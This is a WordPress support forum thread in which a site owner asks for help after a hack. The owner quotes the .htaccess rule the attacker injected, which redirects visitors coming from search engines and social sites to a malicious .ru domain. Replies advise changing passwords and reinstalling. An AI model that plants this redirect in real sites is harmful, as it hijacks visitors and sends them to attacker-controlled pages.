WordPress.org

Ready to get started?Download WordPress

Forums

vbzbb-naagz attack sites hacked (6 posts)

  1. nims
    Member
    Posted 2 years ago #

    One of my hosting account was hacked and infected with vbzbb-naagz malicious code. It infected all my WP sites hosted under that account. I guess one wordpress site I had was running 1 year old version of WP. Ofcource now I will install a fresh and new version of WP on all infected sites. The htaccess files had this code injected.
    <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://vbzbb-naagz.ru/gzuzu?11 [R=301,L] </IfModule>

    Can someone help in finding a cleanup solution for this.

  2. Arie Putranto
    Member
    Posted 2 years ago #

    It's definitely not WordPress being hack, but your host being compromised. Ask your host to help out, but changing your passwords (cpanel, ftp, email, wp-admin etc) will be good.

  3. nims
    Member
    Posted 2 years ago #

    Its not the host.

    A strange thing happened. I deleted all the files and installed a fresh WP. The site worked fine but as soon as I uploaded my child theme it again got redirected to unwanted site. I checked all the files and there was no suspicious code.

    One of my friend helped me and asked me to comment out the logo.gif in header. I did and the site was fine. Conclusion the gif image was infected with some redirection code. Thats something worrying. I have more than 100 images on this site, how do I scan which image is corrupted and how do I remove the injected code from the image ?

  4. pacificnewmedia
    Member
    Posted 2 years ago #

    It's in your htaccess file - scroll far to the right to see the 301 redirects that send them to that site

  5. Krishna
    Volunteer Moderator
    Posted 2 years ago #

    Please post your URL name.

  6. nims
    Member
    Posted 2 years ago #

    Made the hosting company delete everything and install a fresh copy. Also it seemed there was some redirection code injected in the gif image.

Topic Closed

This topic has been closed to new replies.

About this Topic